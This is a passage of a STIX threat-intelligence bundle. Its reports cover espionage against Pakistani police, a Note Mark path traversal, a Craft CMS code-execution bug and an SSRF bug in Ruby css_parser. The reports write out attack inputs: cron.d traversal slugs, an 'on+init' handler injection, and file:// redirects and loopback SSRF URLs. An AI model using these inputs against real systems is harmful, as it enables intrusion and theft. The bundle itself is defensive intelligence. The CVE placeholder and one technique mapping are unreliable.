      "target_ref": "indicator--7a8736dd-a52b-5289-b016-90c7d6c76017"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--51877538-b404-5948-981c-0a8155d6bb5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8093b4b3-b288-5577-aecd-084f9f7c6f81",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--56fd3c7f-e9ec-5100-b203-8c612c6f248f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f8c38b42-ee45-58af-8a0e-71db6a20cfea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--864b248e-cbcd-54d3-9ad2-2419082fb46a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5c68e5ee-f210-5287-947e-ba9e770da24c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ccd2acba-a9e8-5fe1-81ae-b8fdc9345901",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Rival Espionage Actors Converge on Pakistani Law Enforcement",
      "description": "## Overview\n\nSuspected China- and India-nexus threat actors conducted separate cyberespionage operations targeting several Pakistani law enforcement organizations, primarily Balochistan Police, from February 2024 to April 2026. These distinct groups compromised web applications, such as the Complaint Management System, and network appliances. China-nexus actors deployed custom implants, masquerading as portal updates, to weaponize these applications against both police staff and citizens. The attackers utilized post-exploitation tools like PlugX, ShadowPad, Cobalt Strike, and Remcos for command and control and data exfiltration, communicating with various identified C2 IP addresses. The targeting of law enforcement bodies provides insights into Pakistan's internal security, driven by China's concern for its nationals' safety and India's adversarial relationship with Pakistan over regional insurgencies.\n\n## Attack Chain\n\n1. **Initial Access**: Threat actors gain access to externally facing web applications (e.g., Complaint Management System) and network appliances belonging to Pakistani law enforcement.\n2. **Deployment**: China-nexus actors deployed custom implants masquerading as legitimate portal updates within compromised web applications.\n3. **Execution**: Malicious implants are executed on the compromised servers or workstations, establishing an initial foothold within the victim environment.\n4. **Command and Control**: Post-exploitation tools like PlugX, ShadowPad, Cobalt Strike, and Remcos communicate with external command and control (C2) servers over network connections (e.g., 172.111.233.36, 45.125.32.218).\n5. **Collection**: Threat actors accessed and collected sensitive data from compromised servers, including criminal records, biometric information, hotel and tenant registrations, and personnel data.\n6. **Exfiltration**: Collected sensitive data is transferred from the compromised networks to attacker-controlled C2 infrastructure via established communication channels.\n7. **Persistence**: Implants and other malicious components are maintained on compromised systems, ensuring sustained access for long-term espionage objectives.\n\n## Impact\n\nThe intrusions resulted in the compromise of servers hosting critical web applications managing police and citizen data, including criminal and biometric records, hotel and tenant registrations linked to national identity records, and personnel files. Law enforcement organizations in Balochistan, Khyber Pakhtunkhwa, Islamabad, and Punjab were confirmed as affected targets. The compromise of a Complaint Management System by China-nexus actors put both police staff and citizens' data at risk. The primary impact is the loss of sensitive internal security intelligence for Pakistan and potential privacy breaches for citizens, fueling China's independent assessment of security risks to its nationals and providing India with insights into Pakistan's security posture.\n\n## Recommendation\n\n* Deploy the Sigma rule \"Detect Outbound Network Connections to Known Espionage C2 IPs\" in this brief to your SIEM and tune for your environment.\n* Block the C2 IP addresses (e.g., 172.111.233.36, 45.125.32.218, 142.171.183.8, 89.31.121.220) listed in the IOC table at the network perimeter or firewall.\n* Implement robust security controls and regular patching for all externally-facing web applications, especially those managing sensitive data like the Complaint Management System.\n* Conduct regular integrity checks and threat hunting on web application files and associated directories to detect unauthorized modifications or masqueraded updates.\n* Monitor network traffic for outbound connections to suspicious IP addresses and known C2 infrastructure associated with PlugX, ShadowPad, Cobalt Strike, and Remcos.\n",
      "published": "2026-07-09T12:57:07Z",
      "labels": [
        "cyberespionage",
        "nation-state",
        "data-exfiltration",
        "web-application",
        "command-and-control",
        "malware"
      ],
      "object_refs": [
        "indicator--7fca924f-9516-5b4a-a229-2daaa1d98a8b",
        "indicator--db80c7f5-302b-54bd-b119-f0eb011e33a7",
        "indicator--7e720072-d259-5088-a051-240d344ef411",
        "indicator--1c245bd6-a51b-54a7-93b7-830d672c34da",
        "indicator--d7237bc5-4c91-5497-aaa4-2cf4c2abff71",
        "indicator--886f98b0-617e-520e-bd30-861ee76bcc2b",
        "indicator--0fbd1c4f-94d3-5005-b744-aa8b3e101238",
        "indicator--e0117439-f608-50f8-b843-c81223d8dcf2",
        "indicator--ff245fe3-3ec8-5b0b-94fa-b691ed2f0f65",
        "indicator--421fdc48-a707-5b26-b24a-ac9544575a45",
        "indicator--8c022814-178b-55ef-9579-7ee27541272a",
        "indicator--cf6a3a73-cf9e-5870-b42c-5156f595fd6d",
        "indicator--7a8736dd-a52b-5289-b016-90c7d6c76017",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.sentinelone.com/labs/one-target-china-india-espionage-converge-on-pakistani-law-enforcement/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cef846ce-f962-50fb-9646-112081004b7f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Shai-Hulud Campaign Activity",
      "description": "## Overview\n\nThis brief tracks activity attributed to the Shai-Hulud campaign. Sightings and\nindicators from separate reports are folded in as they are published, rather\nthan creating a separate brief per report.\n\n## Recommendation\n\nReview the collected indicators and references and hunt for Shai-Hulud delivery\npatterns across endpoint and network telemetry.\n",
      "published": "2026-07-09T13:04:28Z",
      "labels": [
        "campaign",
        "shai-hulud"
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "External Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1133",
          "url": "https://attack.mitre.org/techniques/T1133"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--46170036-5315-5cb0-9fed-314da43d36b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a953c4bd-805c-54a1-8332-267743472e3d",
      "target_ref": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ff3b0e0d-f5cc-5fe0-b681-63f1d9faba9b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a953c4bd-805c-54a1-8332-267743472e3d",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create or Modify System Process",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1543",
          "url": "https://attack.mitre.org/techniques/T1543"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--166c9df1-68e3-5a2c-a8bb-91bd052f1d49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a953c4bd-805c-54a1-8332-267743472e3d",
      "target_ref": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--be885fea-cf7a-5b7c-95ff-13bf36b9d588",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a953c4bd-805c-54a1-8332-267743472e3d",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a953c4bd-805c-54a1-8332-267743472e3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Note Mark Path Traversal Vulnerability (CVE-2026-50553)",
      "description": "## Overview\n\nNote Mark, a note-taking application developed by Enchant97, is affected by CVE-2026-50553, a critical path traversal vulnerability present in versions up to and including v0.19.4. This vulnerability stems from an unanchored regex pattern (`[a-z0-9-]+`) used for validating 'slug' parameters in book and note creation APIs, allowing malicious input such as `../../../../../../tmp/escape` to be accepted and stored verbatim. When an administrator subsequently runs the `note-mark migrate export` or `export-v1` CLI commands - often with root privileges in environments like Docker - the application uses `path.Join` with these unsanitized slugs, resolving the traversal sequences. This allows an authenticated attacker to cause arbitrary directories to be created and files written to locations outside the designated export directory, enabling privilege escalation to root through mechanisms like writing to `/etc/cron.d/` or systemd unit directories. The vulnerability is a sibling of GHSA-g49p-4qxj-88v3, affecting similar code paths within the export functionality.\n\n## Attack Chain\n\n1. An attacker, as a low-privilege authenticated user, registers or logs into a Note Mark instance.\n2. The attacker sends a `POST` request to the `/api/books` or `/api/notes` endpoint, including a crafted `slug` parameter containing directory traversal sequences (e.g., `../../../../../../etc/cron.d/x`).\n3. Note Mark's OpenAPI/huma validation, due to an unanchored `pattern:\"[a-z0-9-]+\"` regex, incorrectly validates and accepts the malicious slug.\n4. The application stores this malicious slug verbatim in its database, associated with the attacker's created book or note.\n5. At a later time, an administrator executes the `note-mark migrate export` or `note-mark migrate export-v1` CLI command, typically with root privileges (e.g., in a Docker container).\n6. During the export process, the application uses `path.Join` to construct file paths, incorporating the unsanitized, malicious slug retrieved from the database.\n7. `path.Join` resolves the `../` segments, causing `os.MkdirAll` to create an attacker-controlled directory and `os.Create` to write the note's `_index.md` file to an arbitrary location outside the intended export directory (e.g., `/etc/cron.d/x`).\n8. By writing to critical system directories, the attacker achieves arbitrary code execution as root, enabling privilege escalation and persistent access.\n\n## Impact\n\nThis vulnerability allows any registered user to facilitate arbitrary file writes with root privileges on the server hosting Note Mark, given that an administrator later performs a routine data export. If the export command is run as root (a common practice in Docker deployments or by system administrators), an attacker can write malicious cron jobs (`/etc/cron.d/`) or systemd unit files to achieve remote code execution as root. The potential damage includes full system compromise, data theft, or system disruption. This vulnerability poses a direct and severe risk to the integrity and confidentiality of the affected systems.\n\n## Recommendation\n\n* Patch CVE-2026-50553 immediately by upgrading Note Mark to a version beyond v0.19.4 that includes the fix for GHSA-rqrh-8wpv-x7hh.\n* Deploy the `Detect Note Mark Path Traversal Attempt (CVE-2026-50553)` Sigma rule to your SIEM to identify attempts to inject malicious slugs via the API.\n* Ensure that log sources for `webserver` category are properly configured to capture HTTP request details, including method, URI stem, and query parameters, to activate the rule above.\n* Regularly review administrative practices to ensure that backup and export operations are performed with the minimum necessary privileges and within isolated environments where possible.\n",
      "published": "2026-07-09T13:43:34Z",
      "labels": [
        "path-traversal",
        "privilege-escalation",
        "web-application",
        "rce",
        "go",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-rqrh-8wpv-x7hh"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9f092fd2-1349-51ab-9f15-54a1c999b8e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--339eb0ca-9722-5eb3-8120-673756dd44ed",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--339eb0ca-9722-5eb3-8120-673756dd44ed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Craft CMS RCE via Missing cleanseConfig in FieldsController",
      "description": "## Overview\n\nA critical vulnerability (GHSA-86vw-x4ww-x467) has been identified in Craft CMS, affecting versions 5.5.0 through 5.9.13, that allows authenticated administrators to achieve Remote Code Execution (RCE). The `actionRenderCardPreview()` method within the `FieldsController` component incorrectly passes the `fieldLayoutConfig` POST parameter directly to `Fields::createLayout()` without invoking `Component::cleanseConfig()`. This oversight permits attackers to inject malicious Yii2 event handlers through `on eventName` keys in the configuration array, leading to arbitrary PHP function execution. The impact extends to information disclosure, potentially exposing sensitive data like database credentials and `CRAFT_SECURITY_KEY` via `phpinfo()` output, posing a significant risk of full system compromise for affected installations.\n\n## Attack Chain\n\n1. An attacker obtains or compromises legitimate administrative credentials for a Craft CMS instance.\n2. The authenticated attacker crafts a malicious HTTP POST request targeting the `/admin/actions/fields/render-card-preview` endpoint.\n3. The request includes a `fieldLayoutConfig` POST parameter containing a specially formed `on+init` key, such as `fieldLayoutConfig[on+init]=phpinfo`.\n4. The vulnerable `actionRenderCardPreview()` method processes this parameter without proper sanitization.\n5. When the `FieldLayout` object is constructed, Yii2 interprets the `on init` key as an event handler registration.\n6. During the `Component::init()` execution, the registered `init` event is triggered, leading to the execution of the attacker-supplied PHP function (e.g., `phpinfo()`).\n7. The server responds with the output of the executed PHP function, potentially disclosing sensitive environment variables, system information, and configuration secrets, or executing arbitrary commands.\n\n## Impact\n\nSuccessful exploitation allows an authenticated administrator to achieve full Remote Code Execution (RCE) on the Craft CMS server. This can lead to complete compromise of the web server and its underlying data, including the exfiltration of sensitive information such as database credentials and the `CRAFT_SECURITY_KEY`. The ability to execute arbitrary PHP functions allows for a wide range of malicious activities, from defacement and data manipulation to establishing persistent backdoors and escalating privileges within the hosting environment. While requiring existing admin access, the severity of the code execution and information disclosure capabilities represents a critical risk.\n\n## Recommendation\n\n* Immediately update Craft CMS installations to a patched version beyond 5.9.13 to remediate GHSA-86vw-x4ww-x467.\n* Deploy the Sigma rules in this brief to your SIEM to detect exploitation attempts against `/admin/actions/fields/render-card-preview`.\n* Monitor web server access logs for requests to `/admin/actions/fields/render-card-preview` containing unusual or suspicious query parameters.\n* Implement strong authentication mechanisms, such as multi-factor authentication (MFA), for all Craft CMS administrator accounts to prevent credential compromise.\n* Review the `references` URL for the official advisory and patching instructions from Craft CMS.\n",
      "published": "2026-07-09T13:46:12Z",
      "labels": [
        "rce",
        "web-application",
        "cms",
        "craft-cms",
        "php"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-86vw-x4ww-x467"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gather Victim Host Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1592",
          "url": "https://attack.mitre.org/techniques/T1592"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--704dc12b-36f9-5ae2-a525-501b64358fdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3140fa3-c1bb-5576-989d-025099f5a03c",
      "target_ref": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1acd0171-18db-5ff4-8989-29196feff0aa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3140fa3-c1bb-5576-989d-025099f5a03c",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b61632cb-2cd6-5b3f-9fa5-bdabb2e434e5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3140fa3-c1bb-5576-989d-025099f5a03c",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Defacement",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--83f575c3-a1e5-5545-b878-0f669df6d6f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3140fa3-c1bb-5576-989d-025099f5a03c",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b3140fa3-c1bb-5576-989d-025099f5a03c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ruby CSS Parser Vulnerable to SSRF and Local File Disclosure via `read_remote_file`",
      "description": "## Overview\n\nThe Ruby `css_parser` library, specifically versions 2.2.0 and earlier, contains a critical vulnerability (SSRF and local file disclosure) within its `CssParser::Parser#read_remote_file` method. This function, utilized by `load_uri!` and the `@import`-following branch of `add_block!`, lacks proper validation, allowing HTTP/HTTPS requests to arbitrary hosts and ports, including internal, loopback, and RFC-1918 addresses. The vulnerability escalates to arbitrary local file disclosure when a malicious HTTP redirect leads to a `file://` URI. This flaw enables attackers to conduct internal network discovery, exfiltrate sensitive data from block-style configuration files, enumerate file existence, and perform Denial of Service attacks via decompression bombs or by triggering side-effecting GET requests on internal services. Applications like Premailer, which hand attacker-influenced CSS with a `base_uri:` option to `css_parser`, are particularly exposed, requiring only a single `@import url(...)` rule in the parsed CSS.\n\n## Attack Chain\n\n1. An attacker crafts a malicious CSS stylesheet containing an `@import url(...)` directive, pointing to an attacker-controlled HTTP/HTTPS server.\n2. A vulnerable application, which uses the `css_parser` library (version 2.2.0 or earlier) to process untrusted CSS with a `base_uri:` option (e.g., via Premailer), encounters the malicious `@import` rule.\n3. The `css_parser` library's `CssParser::Parser#add_block!` or `Parser#load_uri!` methods invoke `read_remote_file` with the attacker-controlled URL.\n4. **SSRF (Internal Network Access):** The `read_remote_file` method makes an HTTP/HTTPS request to an internal target (e.g., `http://127.0.0.1:18080/admin-credentials`). If the response is CSS-shaped, its content can be exfiltrated via the application's output.\n5. **Local File Disclosure (LFI) Escalation:** The attacker-controlled server responds with an HTTP 302 redirect, sending a `Location:` header pointing to a `file://` URI (e.g., `Location: file:///etc/nginx/nginx.conf`).\n6. `read_remote_file` recursively follows this cross-scheme redirect and directly calls `File.read` on the specified local file path.\n7. If the content of the local file is CSS-shaped (e.g., block-style configuration files like nginx configs, HCL, Caddy), it is parsed by `css_parser` and its contents (selectors, declarations) become recoverable via the parser's API.\n8. The application then outputs the parsed CSS (e.g., Premailer renders it into HTML), effectively exfiltrating the sensitive local file content to the attacker.\n\n## Impact\n\nThe vulnerability in `css_parser` allows for significant impact on systems processing untrusted CSS. Successful exploitation can lead to unauthorized access to internal network resources, including sensitive administrative interfaces and cloud metadata services (e.g., AWS IMDS, GCP/Azure equivalents). It facilitates arbitrary local file disclosure, potentially exposing critical system configurations, API keys, or other sensitive data, particularly from files structured in block-style DSLs (like nginx or HCL configuration files). Attackers can also use this flaw as a file-existence oracle to enumerate system filesystem layouts and installed software. Furthermore, the forced decompression functionality can be abused to trigger Denial of Service conditions through decompression bombs, exhausting system resources.\n\n## Recommendation\n\n* Upgrade the `css_parser` gem to a patched version immediately to remediate CVE-2024-XXXX (CVE ID will be assigned).\n* Implement strict input validation and sanitization for all CSS content originating from untrusted sources before it is processed by the `css_parser` library.\n* Configure network egress filtering to prevent unexpected outbound connections from application servers to internal IP ranges, loopback addresses, or the internet, for processes that should not initiate such connections.\n* Monitor application logs for unusual URI access attempts, particularly those attempting to access `file://` schemes or internal HTTP/HTTPS endpoints from CSS processing functions.\n",
      "published": "2026-07-09T13:47:12Z",
      "labels": [
        "ssrf",
        "lfi",
        "supply-chain",
        "ruby",
        "vulnerability",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-9pmc-p236-855h"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--15859f9a-3782-502a-8f73-0ad01fb8fa2e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc30d640-9a52-5dc9-a4e9-5fe7e88e7ed6",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
